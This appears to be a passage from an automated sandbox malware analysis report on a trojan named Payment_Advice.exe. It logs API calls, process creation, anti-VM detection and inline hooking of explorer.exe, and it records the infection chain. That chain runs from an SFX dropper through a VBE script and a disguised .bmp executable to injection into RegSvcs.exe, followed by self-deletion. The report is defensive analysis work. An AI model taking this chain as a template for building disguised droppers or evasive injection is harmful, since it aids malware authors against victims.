          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01712BE0 NtQueryValueKey,14_2_01712BE0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01712BA0 NtEnumerateValueKey,14_2_01712BA0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01712B80 NtQueryInformationFile,14_2_01712B80
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01712AF0 NtWriteFile,14_2_01712AF0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01712AB0 NtWaitForSingleObject,14_2_01712AB0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01712D00 NtSetInformationFile,14_2_01712D00
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01712DB0 NtEnumerateKey,14_2_01712DB0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01712C60 NtCreateKey,14_2_01712C60
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01712C00 NtQueryInformationProcess,14_2_01712C00
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01712CF0 NtOpenProcess,14_2_01712CF0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01712CC0 NtQueryVirtualMemory,14_2_01712CC0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01712F60 NtCreateProcessEx,14_2_01712F60
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01712FA0 NtQuerySection,14_2_01712FA0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01712E30 NtWriteVirtualMemory,14_2_01712E30
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01712EE0 NtQueueApcThread,14_2_01712EE0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01713010 NtOpenDirectoryObject,14_2_01713010
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01713090 NtSetValueKey,14_2_01713090
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_017135C0 NtCreateMutant,14_2_017135C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_017139B0 NtGetContextThread,14_2_017139B0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01713D70 NtOpenThread,14_2_01713D70
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01713D10 NtOpenProcessToken,14_2_01713D10
          Source: C:\Windows\explorer.exeCode function: 15_2_1069D232 NtCreateFile,15_2_1069D232
          Source: C:\Windows\explorer.exeCode function: 15_2_1069EE12 NtProtectVirtualMemory,15_2_1069EE12
          Source: C:\Windows\explorer.exeCode function: 15_2_1069EE0A NtProtectVirtualMemory,15_2_1069EE0A
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_00A564CA NtQueryInformationToken,16_2_00A564CA
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_00A54823 NtQueryVolumeInformationFile,GetFileInformationByHandleEx,16_2_00A54823
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_00A5643A NtOpenThreadToken,NtOpenProcessToken,NtClose,16_2_00A5643A
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_00A67460 EnterCriticalSection,LeaveCriticalSection,fprintf,fflush,TryAcquireSRWLockExclusive,NtCancelSynchronousIoFile,ReleaseSRWLockExclusive,_get_osfhandle,FlushConsoleInputBuffer,16_2_00A67460
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_00A6C1FA SetLastError,CreateDirectoryW,CreateFileW,RtlDosPathNameToNtPathName_U,memset,memcpy,memcpy,NtFsControlFile,RtlNtStatusToDosError,SetLastError,CloseHandle,RtlFreeHeap,RemoveDirectoryW,16_2_00A6C1FA
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_00A6A135 NtSetInformationFile,16_2_00A6A135
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_00A56500 NtQueryInformationToken,NtQueryInformationToken,16_2_00A56500
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_00A44E3B _setjmp3,NtQueryInformationProcess,NtSetInformationProcess,NtSetInformationProcess,longjmp,16_2_00A44E3B
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_00A54759 RtlDosPathNameToRelativeNtPathName_U_WithStatus,NtOpenFile,RtlReleaseRelativeName,RtlFreeUnicodeString,CloseHandle,DeleteFileW,GetLastError,16_2_00A54759
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_037C2B60 NtClose,LdrInitializeThunk,16_2_037C2B60
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_037C2AD0 NtReadFile,LdrInitializeThunk,16_2_037C2AD0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_037C2F30 NtCreateSection,LdrInitializeThunk,16_2_037C2F30
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_037C2FE0 NtCreateFile,LdrInitializeThunk,16_2_037C2FE0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_037C2EA0 NtAdjustPrivilegesToken,LdrInitializeThunk,16_2_037C2EA0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_037C2D10 NtMapViewOfSection,LdrInitializeThunk,16_2_037C2D10
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_037C2DF0 NtQuerySystemInformation,LdrInitializeThunk,16_2_037C2DF0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_037C2DD0 NtDelayExecution,LdrInitializeThunk,16_2_037C2DD0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_037C2C70 NtFreeVirtualMemory,LdrInitializeThunk,16_2_037C2C70
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_037C2C60 NtCreateKey,LdrInitializeThunk,16_2_037C2C60
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_037C2CA0 NtQueryInformationToken,LdrInitializeThunk,16_2_037C2CA0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_037C35C0 NtCreateMutant,LdrInitializeThunk,16_2_037C35C0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_037C4340 NtSetContextThread,16_2_037C4340
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_037C4650 NtSuspendThread,16_2_037C4650
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_037C2BF0 NtAllocateVirtualMemory,16_2_037C2BF0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_037C2BE0 NtQueryValueKey,16_2_037C2BE0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_037C2BA0 NtEnumerateValueKey,16_2_037C2BA0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_037C2B80 NtQueryInformationFile,16_2_037C2B80
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_037C2AF0 NtWriteFile,16_2_037C2AF0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_037C2AB0 NtWaitForSingleObject,16_2_037C2AB0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_037C2F60 NtCreateProcessEx,16_2_037C2F60
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_037C2FB0 NtResumeThread,16_2_037C2FB0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_037C2FA0 NtQuerySection,16_2_037C2FA0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_037C2F90 NtProtectVirtualMemory,16_2_037C2F90
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_037C2E30 NtWriteVirtualMemory,16_2_037C2E30
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_037C2EE0 NtQueueApcThread,16_2_037C2EE0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_037C2E80 NtReadVirtualMemory,16_2_037C2E80
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_037C2D30 NtUnmapViewOfSection,16_2_037C2D30
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_037C2D00 NtSetInformationFile,16_2_037C2D00
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_037C2DB0 NtEnumerateKey,16_2_037C2DB0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_037C2C00 NtQueryInformationProcess,16_2_037C2C00
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_037C2CF0 NtOpenProcess,16_2_037C2CF0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_037C2CC0 NtQueryVirtualMemory,16_2_037C2CC0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_037C3010 NtOpenDirectoryObject,16_2_037C3010
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_037C3090 NtSetValueKey,16_2_037C3090
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_037C39B0 NtGetContextThread,16_2_037C39B0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_037C3D70 NtOpenThread,16_2_037C3D70
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_037C3D10 NtOpenProcessToken,16_2_037C3D10
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_02B6A3D0 NtReadFile,16_2_02B6A3D0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_02B6A320 NtCreateFile,16_2_02B6A320
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_02B6A450 NtClose,16_2_02B6A450
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_02B6A2DB NtCreateFile,16_2_02B6A2DB
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_02B6A3CA NtReadFile,16_2_02B6A3CA
          Source: C:\Users\user\Desktop\Payment_Advice.exeCode function: 0_2_00506FAA: __EH_prolog,_wcslen,_wcslen,CreateFileW,CloseHandle,CreateDirectoryW,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW,0_2_00506FAA
          Source: Payment_Advice.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@105/31@10/8
          Source: C:\Users\user\Desktop\Payment_Advice.exeFile read: C:\Windows\win.iniJump to behavior
          Source: C:\Users\user\Desktop\Payment_Advice.exeCode function: 0_2_00506C74 GetLastError,FormatMessageW,0_2_00506C74
          Source: C:\Users\user\Desktop\Payment_Advice.exeCode function: 0_2_0051A6C2 FindResourceW,SizeofResource,LoadResource,LockResource,GlobalAlloc,GlobalLock,GdipCreateHBITMAPFromBitmap,GlobalUnlock,GlobalFree,0_2_0051A6C2
          Source: Payment_Advice.exeReversingLabs: Detection: 44%
          Source: Payment_Advice.exeVirustotal: Detection: 48%
          Source: C:\Users\user\Desktop\Payment_Advice.exeFile read: C:\Users\user\Desktop\Payment_Advice.exeJump to behavior
          Source: C:\Users\user\Desktop\Payment_Advice.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\Payment_Advice.exe C:\Users\user\Desktop\Payment_Advice.exe
          Source: C:\Users\user\Desktop\Payment_Advice.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\RarSFX0\pis-e.vbe"
          Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c ewdbwwfpdh.bmp fjrpidauk.jpg
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\RarSFX0\ewdbwwfpdh.bmp ewdbwwfpdh.bmp fjrpidauk.jpg
          Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c ipconfig /renew
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /renew
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ewdbwwfpdh.bmpProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ewdbwwfpdh.bmpProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\Payment_Advice.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\RarSFX0\pis-e.vbe" Jump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c ewdbwwfpdh.bmp fjrpidauk.jpgJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c ipconfig /renew Jump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\RarSFX0\ewdbwwfpdh.bmp ewdbwwfpdh.bmp fjrpidauk.jpgJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ewdbwwfpdh.bmpProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ewdbwwfpdh.bmpProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /renew Jump to behavior
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exeJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
          Source: C:\Users\user\Desktop\Payment_Advice.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ewdbwwfpdh.bmpCode function: 6_2_001D194F AdjustTokenPrivileges,CloseHandle,6_2_001D194F
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ewdbwwfpdh.bmpCode function: 6_2_001D1F53 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,6_2_001D1F53
          Source: C:\Users\user\Desktop\Payment_Advice.exeFile created: C:\Users\user\AppData\Local\Temp\RarSFX0Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ewdbwwfpdh.bmpCode function: 6_2_001F4089 CoInitialize,CoUninitialize,CoCreateInstance,IIDFromString,VariantInit,VariantClear,6_2_001F4089
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ewdbwwfpdh.bmpCode function: 6_2_001E5B27 SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,6_2_001E5B27
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ewdbwwfpdh.bmpCode function: 6_2_001DDC9C CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,FindCloseChangeNotification,6_2_001DDC9C
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4428:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1996:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1568:120:WilError_03
          Source: C:\Users\user\Desktop\Payment_Advice.exeCommand line argument: sfxname0_2_0051DF1E
          Source: C:\Users\user\Desktop\Payment_Advice.exeCommand line argument: sfxstime0_2_0051DF1E
          Source: C:\Users\user\Desktop\Payment_Advice.exeCommand line argument: STARTDLG0_2_0051DF1E
          Source: C:\Users\user\Desktop\Payment_Advice.exeCommand line argument: xzU0_2_0051DF1E
          Source: Window RecorderWindow detected: More than 3 window changes detected
          Source: Payment_Advice.exeStatic file information: File size 1131860 > 1048576
          Source: Payment_Advice.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
          Source: Payment_Advice.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
          Source: Payment_Advice.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
          Source: Payment_Advice.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
          Source: Payment_Advice.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
          Source: Payment_Advice.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
          Source: Payment_Advice.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
          Source: Payment_Advice.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
          Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: Payment_Advice.exe
          Source: Binary string: RegSvcs.pdb, source: explorer.exe, 0000000F.00000002.3891932584.00000000122AF000.00000004.80000000.00040000.00000000.sdmp, cmd.exe, 00000010.00000002.3842961223.0000000002FD4000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000010.00000002.3848016870.0000000003C9F000.00000004.10000000.00040000.00000000.sdmp
          Source: Binary string: wntdll.pdbUGP source: RegSvcs.exe, 0000000E.00000002.1648193337.00000000016A0000.00000040.00001000.00020000.00000000.sdmp, cmd.exe, 00000010.00000003.1648028584.00000000033FB000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000010.00000003.1649872985.00000000035A6000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000010.00000002.3844385329.0000000003750000.00000040.00001000.00020000.00000000.sdmp, cmd.exe, 00000010.00000002.3844385329.00000000038EE000.00000040.00001000.00020000.00000000.sdmp
          Source: Binary string: cmd.pdbUGP source: RegSvcs.exe, 0000000E.00000002.1648104707.0000000001640000.00000040.10000000.00040000.00000000.sdmp, cmd.exe, 00000010.00000002.3842017169.0000000000A40000.00000040.80000000.00040000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: RegSvcs.exe, RegSvcs.exe, 0000000E.00000002.1648193337.00000000016A0000.00000040.00001000.00020000.00000000.sdmp, cmd.exe, cmd.exe, 00000010.00000003.1648028584.00000000033FB000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000010.00000003.1649872985.00000000035A6000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000010.00000002.3844385329.0000000003750000.00000040.00001000.00020000.00000000.sdmp, cmd.exe, 00000010.00000002.3844385329.00000000038EE000.00000040.00001000.00020000.00000000.sdmp
          Source: Binary string: RegSvcs.pdb source: explorer.exe, 0000000F.00000002.3891932584.00000000122AF000.00000004.80000000.00040000.00000000.sdmp, cmd.exe, 00000010.00000002.3842961223.0000000002FD4000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000010.00000002.3848016870.0000000003C9F000.00000004.10000000.00040000.00000000.sdmp
          Source: Binary string: cmd.pdb source: RegSvcs.exe, 0000000E.00000002.1648104707.0000000001640000.00000040.10000000.00040000.00000000.sdmp, cmd.exe, cmd.exe, 00000010.00000002.3842017169.0000000000A40000.00000040.80000000.00040000.00000000.sdmp
          Source: Payment_Advice.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
          Source: Payment_Advice.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
          Source: Payment_Advice.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
          Source: Payment_Advice.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
          Source: Payment_Advice.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
          Source: C:\Users\user\Desktop\Payment_Advice.exeCode function: 0_2_0051F640 push ecx; ret 0_2_0051F653
          Source: C:\Users\user\Desktop\Payment_Advice.exeCode function: 0_2_0051EB78 push eax; ret 0_2_0051EB96
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ewdbwwfpdh.bmpCode function: 6_2_001C0330 push edi; ret 6_2_001C0333
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ewdbwwfpdh.bmpCode function: 6_2_00190E06 push ecx; ret 6_2_00190E19
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ewdbwwfpdh.bmpCode function: 6_2_0018DBFE push eax; iretd 6_2_0018DC01
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_00417191 push ebp; retf 14_2_004171B8
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_004169B2 push cs; iretd 14_2_00416AB1
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0040E270 push 38B96F61h; retf 14_2_0040E287
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_00416A2C push cs; iretd 14_2_00416AB1
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0041D475 push eax; ret 14_2_0041D4C8
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0040E422 push FFFFFFC1h; retf 14_2_0040E42A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0041D4C2 push eax; ret 14_2_0041D4C8
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0041D4CB push eax; ret 14_2_0041D532
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0041D52C push eax; ret 14_2_0041D532
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_00416ED7 pushad ; iretd 14_2_00416EDF
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0041DF7D push dword ptr [F81DAF74h]; ret 14_2_0041E493
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_016A225F pushad ; ret 14_2_016A27F9
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_016A27FA pushad ; ret 14_2_016A27F9
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_016D09AD push ecx; mov dword ptr [esp], ecx14_2_016D09B6
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_016A283D push eax; iretd 14_2_016A2858
          Source: C:\Windows\explorer.exeCode function: 15_2_1019A9B5 push esp; retn 0000h15_2_1019AAE7
          Source: C:\Windows\explorer.exeCode function: 15_2_1019AB1E push esp; retn 0000h15_2_1019AB1F
          Source: C:\Windows\explorer.exeCode function: 15_2_1019AB02 push esp; retn 0000h15_2_1019AB03
          Source: C:\Windows\explorer.exeCode function: 15_2_106A0B02 push esp; retn 0000h15_2_106A0B03
          Source: C:\Windows\explorer.exeCode function: 15_2_106A0B1E push esp; retn 0000h15_2_106A0B1F
          Source: C:\Windows\explorer.exeCode function: 15_2_106A09B5 push esp; retn 0000h15_2_106A0AE7
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_00A571ED push ecx; ret 16_2_00A57200
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_00A5722B push ecx; ret 16_2_00A5723E
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_0375225F pushad ; ret 16_2_037527F9
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_037527FA pushad ; ret 16_2_037527F9
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_037809AD push ecx; mov dword ptr [esp], ecx16_2_037809B6
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ewdbwwfpdh.bmpCode function: 6_2_00175D78 GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,6_2_00175D78
          Source: Payment_Advice.exeStatic PE information: section name: .didat
          Source: C:\Users\user\Desktop\Payment_Advice.exeFile created: C:\Users\user\AppData\Local\Temp\RarSFX0\__tmp_rar_sfx_access_check_6359531Jump to behavior

          Persistence and Installation Behavior

          barindex
          Uses ipconfig to lookup or modify the Windows network settings
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /renew
          Source: C:\Users\user\Desktop\Payment_Advice.exeFile created: C:\Users\user\AppData\Local\Temp\RarSFX0\ewdbwwfpdh.bmpJump to dropped file
          Source: C:\Users\user\Desktop\Payment_Advice.exeFile created: C:\Users\user\AppData\Local\Temp\RarSFX0\ewdbwwfpdh.bmpJump to dropped file

          Hooking and other Techniques for Hiding and Protection

          barindex
          Modifies the prolog of user mode functions (user mode inline hooks)
          Source: explorer.exeUser mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x8C 0xCE 0xE6
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ewdbwwfpdh.bmpCode function: 6_2_002025A0 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,6_2_002025A0
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ewdbwwfpdh.bmpCode function: 6_2_0018FC8A GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,6_2_0018FC8A
          Source: C:\Users\user\Desktop\Payment_Advice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ewdbwwfpdh.bmpProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ewdbwwfpdh.bmpProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ewdbwwfpdh.bmpProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ewdbwwfpdh.bmpProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

          Malware Analysis System Evasion

          barindex
          Yara detected AntiVM autoit script
          Source: Yara matchFile source: Process Memory Space: ewdbwwfpdh.bmp PID: 6052, type: MEMORYSTR
          Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
